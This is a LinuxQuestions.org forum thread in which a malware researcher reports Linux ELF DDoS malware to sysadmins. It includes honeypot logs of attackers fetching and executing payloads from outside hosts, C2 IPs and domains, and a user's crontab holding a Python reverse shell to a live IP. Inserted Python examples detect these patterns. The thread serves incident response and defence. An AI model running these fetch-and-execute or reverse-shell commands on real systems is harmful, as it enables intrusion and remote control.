LinuxQuestions.org
Old 07-01-2015, 10:45 AM   #1
malwaremustdie
If you are infected by any of these recent ELF malware cases, please contact us


This is not a spam post, but a serious question. We found these five Linux malware families active in infections in the past 2 weeks.

ChinaZ http://blog.malwaremustdie.org/2015/...-reloaded.html

Xor.DDoS http://blog.malwaremustdie.org/2015/...ection_23.html

DES.Downloader http://blog.malwaremustdie.org/2015/...5-new-elf.html

.IptabLes|x http://blog.malwaremustdie.org/2015/...tables-on.html

Mayhem http://www.kernelmode.info/forum/vie...tart=10#p26116

I am sure fellow server sysadmins know a bit about these malware families. If you happen to have an infection incident, please comment on the above posts by sharing the infection details with us, to handle on an IR basis.

Samples can be uploaded to MediaFire. You can also reach our team at @malwaremustdie (Twitter).

Thank you very much

unixfreaxjp
 
Old 07-03-2015, 04:45 AM   #2
ondoho
could you please explain a little more what you are referring to?
i don't want to click any random blogpost.
 
Old 07-03-2015, 06:29 PM   #3
unSpawn
Quote (originally posted by ondoho): i don't want to click any random blogpost.
These aren't "random web log posts" and if you have any interest in practical security these are worth reading.
 
Old 07-03-2015, 08:25 PM   #4
jefro
I'd have been too skerd to click on them too. Hard to get search results from my known web pages on the topic.

Last edited by jefro; 07-03-2015 at 08:27 PM.
 
Old 07-04-2015, 09:25 AM   #5
Habitual
I read MMD on a regular basis and I have nothing but respect for it.
 
Old 07-04-2015, 10:49 AM   #6
malwaremustdie
I've been working in NIX OS for 21 years now. I started MMD to fight malware of all kinds, but I did not see ELF malware being handled the same as the Windows ones, generally speaking.
I know how it feels to be a sysadmin since I've been one of you in the field, and I know how badly an ELF malware can ruin our weekdays or weekends too. I know how tight the budget is, and I also know how costly server-side protection is if we consider buying one..yet the information is so limited.

So I have dedicated most of my time to ELF recently, until the overall mitigation scheme works better.

The links I posted up there are recent case reports and analyses; the attack sources recently are mostly China, except Linux/Mayhem, which is Ukraine based.

I saw the infection sources or malware web panels and was surprised by the huge number of downloads, especially the ones that ride on the Shellshock infection scheme < this vulnerability really kicks. Also the Elasticsearch exploit and of course the weak SSH forced entries.

So I just think maybe there are more admins hit; this is why I asked. You can click on every link I posted safely, I mean no harm. If you can comment with your cases it will be so wonderful.
We NEED more ways to mitigate the infection, like setting some directories under specific permissions, hardening SELinux on some points, md5sum checks regularly for new changes in files, and so on.

Come on, friends, we can not fight these alone, let's fight this bad stuff together.

MalwareMustDie

Last edited by malwaremustdie; 07-04-2015 at 10:51 AM.
 
Old 07-04-2015, 11:24 AM   #7
Daniel_sal
Come on guys, be smart, the people of malwaremustdie are great, they only want a more secure Linux and to stop China malware; I always read his blog. I'm a sysadmin in Mexico, we have some apps living on Rackspace cloud. In January we noticed some strange binary and IP connections to China; finally we discovered that somebody had infected us with an ELF using a Struts vulnerability on our JBoss app. This is the screenshot of the VirusTotal analysis: https://twitter.com/daniel_sal/statu...450181632?s=09

RHEL 6.5

Hope this helps.
 
Old 07-04-2015, 11:42 AM   #8
malwaremustdie
There is a good repository for Linux sysadmins to identify ELF malware.
It is a perfectly safe site; KernelMode is a community of malware researchers. I am a contributor to the repository too, together with well-known malware researchers.

You can browse these ELF topics shown in the link freely and read the information on what malware hit you; some posts have good mitigation hints too, but you will need to subscribe to get the samples.

Link: http://www.kernelmode.info/forum/vie...hp?f=16&t=3471
 
Old 07-08-2015, 04:53 AM   #9
ondoho
thanks to op & everyone for adding more info on this.

i think it's good forum netiquette to post more than just links to other webpages.
i hadn't come across malwaremustdie before.
i have now.
 
Old 08-22-2015, 11:21 AM   #10
malwaremustdie
There is a new type of ELF malware, a backdoor DDoS type that merges the functions of Linux/Elknot (ref: http://www.kernelmode.info/forum/vie...&t=3099#p23858) and Linux/BillGates (ref: http://www.kernelmode.info/forum/vie...hp?f=16&t=3429).

The source of the threat is AS40676 in Psychz Networks, but it seems like the actors are from the People's Republic of China.

This malware will drop the initial config in the current directory where it is executed:
readlink("/proc/[PID]/exe", "/[PATH]/MALWARE", 1024)
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR)
unlink("/[PATH]/MALWARENAME\\xmit.ini")
open("/[PATH]/MALWARENAME\\xmit.ini", O_RDWR|O_CREAT|O_TRUNC, 0666)
write(3, "0\r\n192.168.x.xx:192.168.x.xx\r\n10000:60000\r\n\r\n0\r\n0:0:0\r\n", 55)
close(3)

Which contains the grepped local Ethernet address with the range of ports to be used for the outbound attack:
00000000 30 0d 0a 31 39 32 2e 31 36 38 2e 37 2e 32 31 3a |0..192.168.x.x:|
00000010 31 39 32 2e 31 36 38 2e 37 2e 32 31 0d 0a 31 30 |192.168.x.xx..10|
00000020 30 30 30 3a 36 30 30 30 30 0d 0a 0d 0a 30 0d 0a |000:60000....0..|
00000030 30 3a 30 3a 30 0d 0a |0:0:0..|

I reversed this malware and found that the code is a bit "raw" and unfinished in some parts, but the main TCP flood and backdoor functions look like they work. Different compared to the old-fashioned previous version that exhausts system resources, this malware runs and only takes about 30% of my CPU usage.

The way to mitigate is to secure the usage of libnss, never open SSH login for root or anyone with suid 0, and don't run FTP and web services, or their components (webapps), that can gain privilege to root. That way /tmp and the current directory of the infection will be the only workplace for such malware to operate in, and it is easier to clean and dissect.

I am sorry to post more links, but if you want to see the boring details, they are here: http://blog.malwaremustdie.org/2015/...w-malware.html
 
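A defender-side check built on the dropped config described in the post above, added here as an example and not the author's code: it parses the six-line xmit.ini body (the 55-byte write() shown in the strace) and walks /tmp and the current directory for files ending in xmit.ini that match that shape. The sample bytes and the 192.168.7.21 address are constructed from the post's hexdump; the directories scanned are an assumption.

```python
import ipaddress
import os
import re
from typing import Optional

# Constructed sample: the 55-byte xmit.ini body rebuilt from the strace write()
# and the hexdump in the post (its bytes decode to a private 192.168.x.x pair).
SAMPLE_XMIT_INI = b"0\r\n192.168.7.21:192.168.7.21\r\n10000:60000\r\n\r\n0\r\n0:0:0\r\n"

_PORT_RANGE = re.compile(r"^(\d{1,5}):(\d{1,5})$")
_TRIPLE = re.compile(r"^\d+:\d+:\d+$")


def parse_xmit_ini(data: bytes) -> Optional[dict]:
    """Parse the dropped config; return its fields, or None if the content does
    not have the six CRLF-terminated lines seen in the post."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text.endswith("\r\n"):
        return None
    lines = text.split("\r\n")[:-1]          # drop the empty piece after the final CRLF
    if len(lines) != 6:
        return None
    flag, ip_range, port_range, blank, flag2, triple = lines
    if blank != "" or not flag.isdigit() or not flag2.isdigit():
        return None
    try:                                     # line 2: "<local ip>:<local ip>"
        lo_ip, hi_ip = (ipaddress.ip_address(p) for p in ip_range.split(":", 1))
    except ValueError:
        return None
    m = _PORT_RANGE.match(port_range)        # line 3: "<low port>:<high port>"
    if not m:
        return None
    lo_port, hi_port = int(m.group(1)), int(m.group(2))
    if not (0 < lo_port <= hi_port <= 65535) or not _TRIPLE.match(triple):
        return None
    return {"src_ip_lo": str(lo_ip), "src_ip_hi": str(hi_ip),
            "port_lo": lo_port, "port_hi": hi_port, "flag": int(flag)}


def scan_dirs(dirs, suffix="xmit.ini", max_bytes=4096):
    """Walk the given directories for files whose name ends in xmit.ini and whose
    content parses as this config.  A suffix match is used because the strace
    shows the file written as "<MALWARENAME>\\xmit.ini": on Linux the backslash
    is part of the file name, so the file lands beside the binary in its cwd."""
    hits = []
    for d in dirs:
        for root, _subdirs, files in os.walk(d):
            for name in files:
                if not name.endswith(suffix):
                    continue
                path = os.path.join(root, name)
                try:
                    with open(path, "rb") as fh:
                        data = fh.read(max_bytes)
                except OSError:
                    continue
                cfg = parse_xmit_ini(data)
                if cfg is not None:
                    hits.append((path, cfg))
    return hits


if __name__ == "__main__":
    print(parse_xmit_ini(SAMPLE_XMIT_INI))
    for path, cfg in scan_dirs(["/tmp", os.getcwd()]):   # assumed scan locations
        print("suspicious config:", path, cfg)
```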
Old 08-22-2015, 01:01 PM   #11
rokytnji
Subscribed to thread. MMD Site bookmarked. Being a slow study. It takes me awhile to soak things in.

Last edited by rokytnji; 08-22-2015 at 01:03 PM.
 
Old 09-15-2015, 06:33 AM   #12
malwaremustdie
A new series of Linux/XOR.DDoS attacks is on our Linux servers, dear admin friends.

It started from SSH brute-force attacks from:
Code:
43.229.52.79
43.229.53.28
43.229.53.49
43.229.53.63
43.229.53.88
43.255.188.139
43.255.189.16
Be cautious of brute-force logins like below:
Code:
2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
2015-06-22 19:42:35+0900 [ip=43.229.52.79] login attempt [root/audenzio1]
2015-06-22 19:42:38+0900 [ip=43.229.52.79] login attempt [root/DROWSS@P1]
2015-06-22 19:42:39+0900 [ip=43.229.52.79] login attempt [root/bcampbell]
2015-06-22 19:42:40+0900 [ip=43.229.52.79] login attempt [root/cmarshall]
2015-06-22 19:42:43+0900 [ip=43.229.52.79] login attempt [root/dragostea]
2015-06-22 19:42:44+0900 [ip=43.229.52.79] login attempt [root/rx.123456]
2015-06-22 19:42:45+0900 [ip=43.229.52.79] login attempt [root/soigan123]
2015-06-22 19:42:48+0900 [ip=43.229.52.79] login attempt [root/adajacobs]
2015-06-22 19:42:50+0900 [ip=43.229.52.79] login attempt [root/ta.123456]
2015-06-22 19:42:51+0900 [ip=43.229.52.79] login attempt [root/aquilino1]
2015-06-22 19:42:54+0900 [ip=43.229.52.79] login attempt [root/root22222]
2015-06-22 19:42:55+0900 [ip=43.229.52.79] login attempt [root/0isPLIqsm]
2015-06-22 19:42:56+0900 [ip=43.229.52.79] login attempt [root/jmcmurray]
2015-06-22 19:42:59+0900 [ip=43.229.52.79] login attempt [root/yr.123456]
2015-06-22 19:43:00+0900 [ip=43.229.52.79] login attempt [root/vikiyulia]
2015-06-22 19:43:01+0900 [ip=43.229.52.79] login attempt [root/doriana12]
2015-06-22 19:43:04+0900 [ip=43.229.52.79] login attempt [root/casper11]
2015-06-22 19:43:06+0900 [ip=43.229.52.79] login attempt [root/yb.123456]
2015-06-22 19:43:07+0900 [ip=43.229.52.79] login attempt [root/wangyi123]
2015-06-22 19:43:10+0900 [ip=43.229.52.79] login attempt [root/uj.123456]
2015-06-22 19:43:11+0900 [ip=43.229.52.79] login attempt [root/aavishkar]
2015-06-22 19:43:12+0900 [ip=43.229.52.79] login attempt [root/046194575]
2015-06-22 19:43:15+0900 [ip=43.229.52.79] login attempt [root/marquardt]
2015-06-22 19:43:16+0900 [ip=43.229.52.79] login attempt [root/pavila123]
2015-06-22 19:43:17+0900 [ip=43.229.52.79] login attempt [root/io.123456]
2015-06-22 19:43:20+0900 [ip=43.229.52.79] login attempt [root/1234%mm&*]
2015-06-22 19:43:22+0900 [ip=43.229.52.79] login attempt [root/victoriar]
2015-06-22 19:43:23+0900 [ip=43.229.52.79] login attempt [root/in.123456]
(...)
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:24:36+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 14:58:45+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-01 15:54:43+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-09-10 13:29:00+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-10 14:18:02+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 10:58:51+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 11:41:14+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-11 12:18:56+0900 [ip=43.229.53.49] login attempt [root/!@]
2015-09-14 13:58:40+0900 [ip=43.229.53.49] login attempt [root/!@]
This will lead to the malware attempting to infect, as per the real log below:
Code:
2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
2015-08-09 19:05:49+0900 [ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
 
2015-08-25 12:45:48+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-25 12:45:48+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-25 12:45:48+0900 [ip=43.229.53.90] wget h00p://43.229.53.88/abf/h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] chmod +x h121
2015-08-25 12:45:48+0900 [ip=43.229.53.90] ./h121
 
2015-08-31 16:29:46+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-08-31 16:29:46+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-31 16:29:46+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] chmod +x i324
2015-08-31 16:29:46+0900 [ip=43.229.53.90] ./i324
 
2015-09-10 13:33:49+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-10 13:33:49+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-10 13:33:49+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] chmod +x g13e
2015-09-10 13:33:49+0900 [ip=43.229.53.90] ./g13e
 
2015-09-14 14:02:02+0900 [ip=43.229.53.90] exec command: #!/bin/sh
2015-09-14 14:02:02+0900 [ip=43.229.53.90] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-09-14 14:02:02+0900 [ip=43.229.53.90] wget h00p://43.229.53.90/abf/f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] chmod +x f1c3
2015-09-14 14:02:02+0900 [ip=43.229.53.90] ./f1c3
If you want to study the malware you can search in VirusTotal; I uploaded some of them, with these hashes:
Code:
 142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
 8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
 a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681
The malware will connect via HTTP to aa.hostasa.org and perform command and control back-connects to several IPs, called by their hostnames, summarized/recorded below:
Code:
aa.hostasa.org  23.234.60.143  // http downloads h00p://aa.hostasa.org/leg.rar 
(is a Xor-ed ELF trojan/downloader malware, prev known as "g.rar")
ns1.hostasa.org 107.160.40.9      // cnc
ns2.hostasa.org 103.240.140.152   // cnc
ns3.hostasa.org 103.240.141.54    // cnc
ns4.hostasa.org 192.126.126.64    // cnc
 
;; AUTHORITY SECTION:
hostasa.org.            3600    IN      NS      ns1cnb.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns4lny.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns3cna.domain-resolution.net.
hostasa.org.            3600    IN      NS      ns2dky.domain-resolution.net.
Some recent PoC of the backdoor/back connection to those CNCs:
Code:
[pid  6990] sendto(3, "\326,\1\0\0\1\0\0\0\0\0\0\3ns4\7hostasa\3org\0\0\1\0"..., 33, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16 <unfinished ...>
[pid  6991] sendto(4, "G\r\1\0\0\1\0\0\0\0\0\0\2aa\7hostasa\3org\0\0\1\0\1", 32, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16 <unfinished ...>

ghrirsbfv  IPv4  324559  TCP MMD-JP.ORG:49214->192.126.126.64:3307 (ESTABLISHED)
ghrirsbfv  IPv4  331887  TCP MMD-JP.ORG:44325->107.160.40.9:3307 (ESTABLISHED)


ghrirsbfv  IPv4  324560  TCP MMD-JP.ORG:58487->23.234.60.143:http (ESTABLISHED)

2015-09-15 06:55:12.954090 IP MMD-JP.ORG.58476 > 23.234.60.143
http: Flags [P.], seq 1:215, ack 1, win 884, options [nop,nop,TS val 34190894 ecr 2820891477], length 214
E..6.@.@....nJ...<..l.Ps...J......tk.........#cU

GET /leg.rar HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Host: aa.hostasa.org
Connection: Keep-Alive
[...]

2015-09-15 06:55:13.121609 IP 23.234.60.143.http > MMD-JP.ORG.58476: 
Flags [.], seq 1:1403, ack 215, win 54, options [nop,nop,TS val 2820891645 ecr 34190894], length 1402
E....h@.4.)#..<..nJ..P.lJ...s..i...6........#c..   ..

HTTP/1.1 200 OK
Date: Tue, 15 Sep 2015 05:54:14 GMT
Server: Apache
Last-Modified: Sun, 07 Dec 2014 08:27:46 GMT
ETag: "2475-5099c15a16480"
Accept-Ranges: bytes
Content-Length: 9333
Keep-Alive: timeout=5, max=2048
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

/&.{L9R$/8PE    .h.pl.~u..qqm....h.{r..v..qop....t.ls.jp..sqv....w.wn.vq..sos
[...]
GeoLocation and routing info for those abused nodes used as CNC by the malware crooks:
Code:
// ------------------------
// Infector & CNC IP routes:
// ------------------------

43.229.52.79||63857 | 43.229.52.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.28||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.49||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.63||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.229.53.88||63857 | 43.229.53.0/24 | HOTNETLIMITED | HK | - | Hot Net Limited
43.255.188.139||36351 | 43.255.188.0/24 | SOFTLAYER | US | - | Sex Insex
43.255.189.16|| |  |  | HK | 0451dns.com | Shimizu Hang Road Causeway Bay Hong Kong International

23.234.60.143||26484 | 23.234.60.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC
107.160.40.9||40676 | 107.160.0.0/16 | AS40676 | US | psychz.net | Psychz Networks
103.240.140.152||62466 | 103.240.140.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
103.240.141.54||62466 | 103.240.141.0/24 | CLEAR-DDOS-AS | CA | clear-ddos.com | ClearDDoS Technologies
192.126.126.64||26484 | 192.126.126.0/24 | HOSTSPACE | US | hostspaces.net | Hostspace Networks LLC

// ------------------------
// Infector & CNC GeoIP 
// ------------------------

43.229.52.79, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.28, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.49, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.63, , ,   Hong Kong, 22.25, 114.1667, AS
43.229.53.88, , ,   Hong Kong, 22.25, 114.1667, AS
43.255.188.139, , , Hong Kong, 22.25, 114.1667, AS
43.255.189.16, , ,  Hong Kong, 22.25, 114.1667, AS

23.234.60.143, Newark, 19711, United States, 39.7151, -75.7306
107.160.40.9, Walnut, 91789, United States, 34.0115, -117.8535
103.240.140.152, Central District, , Hong Kong, 22.2833, 114.15
103.240.141.54, Central District, , Hong Kong, 22.2833, 114.15, AS
192.126.126.64, Los Angeles, 90017, United States, 34.053, -118.2642
Note that the attackers are putting the payload malware on only this IP:
Code:
43.229.53.90
Compared to the previous case of the same actor (threat source), I found that they shifted the CNC IPs to:
Code:
192.126.126.64 & 
107.160.40.9
Reference of this threat:
https://pastebin.com/uT6EhZq0

Reference of this case/actor:
http://blog.malwaremustdie.org/2015/...ection_23.html

Reference of the same malware cases:
http://blog.malwaremustdie.org/2015/...hellshock.html
http://blog.malwaremustdie.org/2014/...new-china.html

Cross-checking the domain registration leads to the contact ID below:
Code:
蔡厚泉 (Cai Hou Sien/Quan) / 2511916764@qq.com

Last edited by malwaremustdie; 09-15-2015 at 09:46 AM. Reason: additional (image)
 
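Detection logic over the two log shapes in the post above (the SSH brute-force lines and the wget / chmod +x / run sequence), added here as an example and not code from the thread: it flags source IPs with five or more login attempts inside one minute and reports completed download-and-execute chains per source IP. The sample lines are reconstructed from the post; the honeypot that produced them is not named there, so the line format and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the post's log format (IPs and commands taken from the post).
SAMPLE_LOG = """\
2015-06-22 19:42:27+0900 [ip=43.229.52.79] login attempt [root/1895-June]
2015-06-22 19:42:28+0900 [ip=43.229.52.79] login attempt [root/ep.123456]
2015-06-22 19:42:29+0900 [ip=43.229.52.79] login attempt [root/otrs12345]
2015-06-22 19:42:32+0900 [ip=43.229.52.79] login attempt [root/123ts3321]
2015-06-22 19:42:34+0900 [ip=43.229.52.79] login attempt [root/rw.123456]
2015-09-01 13:50:34+0900 [ip=43.229.53.28] login attempt [root/!@]
2015-08-09 19:05:49+0900 [ip=43.229.53.88] exec command: #!/bin/sh
2015-08-09 19:05:49+0900 [ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [ip=43.229.53.88] ./h12
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) \[ip=(?P<ip>[\d.]+)\] (?P<msg>.*)$")
LOGIN_RE = re.compile(r"^login attempt \[([^/\]]+)/(.*)\]$")
# h00p:// is the post's defanged spelling; accept it alongside the real scheme
FETCH_RE = re.compile(r"^(?:wget|curl)\s+(?P<url>h(?:00|tt)ps?://\S+)")
CHMOD_RE = re.compile(r"^chmod \+x (?P<name>\S+)$")
RUN_RE = re.compile(r"^\./(?P<name>\S+)$")


def parse(line):
    """Split one log line into (timestamp, source ip, message), or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S%z"), m["ip"], m["msg"]


def brute_force_sources(lines, threshold=5, window=timedelta(seconds=60)):
    """{ip: total attempts} for sources with >= threshold login attempts in any sliding window."""
    attempts = defaultdict(list)
    for ln in lines:
        p = parse(ln)
        if p and LOGIN_RE.match(p[2]):
            attempts[p[1]].append(p[0])
    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                flagged[ip] = len(stamps)
                break
    return flagged


def dropper_chains(lines):
    """Per source ip, track fetch -> chmod +x -> ./run of the same file name;
    return (ip, url, file) for each chain that completed."""
    pending, chains = {}, []
    for ln in lines:
        p = parse(ln)
        if not p:
            continue
        _, ip, msg = p
        fm = FETCH_RE.match(msg)
        if fm:
            pending[ip] = {"url": fm["url"], "name": fm["url"].rsplit("/", 1)[-1], "chmod": False}
            continue
        st = pending.get(ip)
        if st is None:
            continue
        cm, rm = CHMOD_RE.match(msg), RUN_RE.match(msg)
        if cm and cm["name"] == st["name"]:
            st["chmod"] = True
        elif rm and rm["name"] == st["name"] and st["chmod"]:
            chains.append((ip, st["url"], st["name"]))
            del pending[ip]
    return chains
```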
Old 09-17-2015, 03:52 PM   #13
malwaremustdie
I wrote up a new ELF malicious activity, for a threat aimed at Linux, and it has a polymorphic method during infection.

This is a bit technical, but practically all of the analysis I just wrote was done in the bash shell; I jumped over to browse it when I was about to post it. I think it is a thorough explanation combining reverse engineering, Linux kernel debugging and forensics (mostly memory data from /proc) for this simple analysis.

Why I announce it here too is because most samples of this threat (XOR.DDoS) that went into signatures are from pre-infection and not post-infection, so if you conduct the scanning AFTER you get infected..there is a possibility that you get no detection, since the malware self-copied into another size and hash.

Please read; I hope it makes our POSIX based OS safer from these attackers.

http://blog.malwaremustdie.org/2015/...ic-in-elf.html
 
Old 12-05-2016, 01:37 AM   #14
MasterCATZ
My server just got hit today.


Unsure how they gained access; the firewall was set up to drop all connections below port 10000
that are not in my IP range ...

This was in the crontab:

*/1 * * * * root /usr/local/rtm/bin/rtm 35 > /dev/null 2> /dev/null
* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("183.131.83.13",2810));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
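One way to audit crontabs for entries like the two quoted in the post above, written here as an added example rather than anything from the thread: it parses the system and per-user crontab layouts, matches each command against a short list of backdoor indicators (including the socket/dup2/sh pattern in the post) and flags every-minute jobs whose output is silenced. The sample crontab is constructed around the post's two entries; the file paths in audit_host are the usual Linux locations and an assumption about the reader's distribution.

```python
import glob
import re

# Constructed sample in /etc/crontab layout; the last two entries are the ones quoted in the post.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root /usr/local/rtm/bin/rtm 35 > /dev/null 2> /dev/null
* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("183.131.83.13",2810));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
"""

# (label, pattern) pairs; every pattern that matches a command becomes a reason
INDICATORS = [
    ("reverse shell via /dev/tcp", re.compile(r"/dev/(?:tcp|udp)/")),
    ("scripted socket + dup2 + shell", re.compile(r"\.connect\(.*\bdup2\b.*/bin/(?:ba)?sh")),
    ("netcat with -e", re.compile(r"\bnc(?:at)?\b.*\s-e\s")),
    ("interactive shell on redirected fd", re.compile(r"(?:ba)?sh\s+-i\s*[<>]&")),
    ("inline interpreter one-liner", re.compile(r"\b(?:python[23]?|perl|ruby|php)\s+-[cer]\s")),
]
_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text, system=True):
    """Yield (schedule, user, command).  system=True is the /etc/crontab and
    /etc/cron.d layout with a user column; per-user spool files have none."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or _ASSIGN.match(line):
            continue                                  # comments and VAR=value lines
        nfields = 1 if line.startswith("@") else 5    # @reboot etc. vs. five time fields
        parts = line.split(None, nfields + (1 if system else 0))
        if len(parts) != nfields + (2 if system else 1):
            continue
        yield " ".join(parts[:nfields]), (parts[nfields] if system else None), parts[-1]


def score_entry(schedule, user, command):
    """Return the reasons an entry looks like backdoor persistence (empty if none)."""
    reasons = [label for label, rx in INDICATORS if rx.search(command)]
    if schedule in ("* * * * *", "*/1 * * * *") and user in ("root", None) and "/dev/null" in command:
        reasons.append("every-minute job with silenced output")
    return reasons


def audit(text, system=True):
    """Return [(command, reasons)] for every entry that has at least one reason."""
    out = []
    for schedule, user, command in parse_crontab(text, system):
        reasons = score_entry(schedule, user, command)
        if reasons:
            out.append((command, reasons))
    return out


def audit_host():
    """Audit the system crontabs and every per-user spool file on this host (assumed paths)."""
    findings = []
    locations = [(p, True) for p in ["/etc/crontab"] + glob.glob("/etc/cron.d/*")]
    locations += [(p, False) for p in glob.glob("/var/spool/cron/*") + glob.glob("/var/spool/cron/crontabs/*")]
    for path, system in locations:
        try:
            with open(path) as fh:
                findings += [(path, c, r) for c, r in audit(fh.read(), system)]
        except OSError:
            pass                                      # not present or not readable
    return findings


if __name__ == "__main__":
    for path, command, reasons in audit_host():
        print(path, "|", command[:80], "|", ", ".join(reasons))
```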
 
  

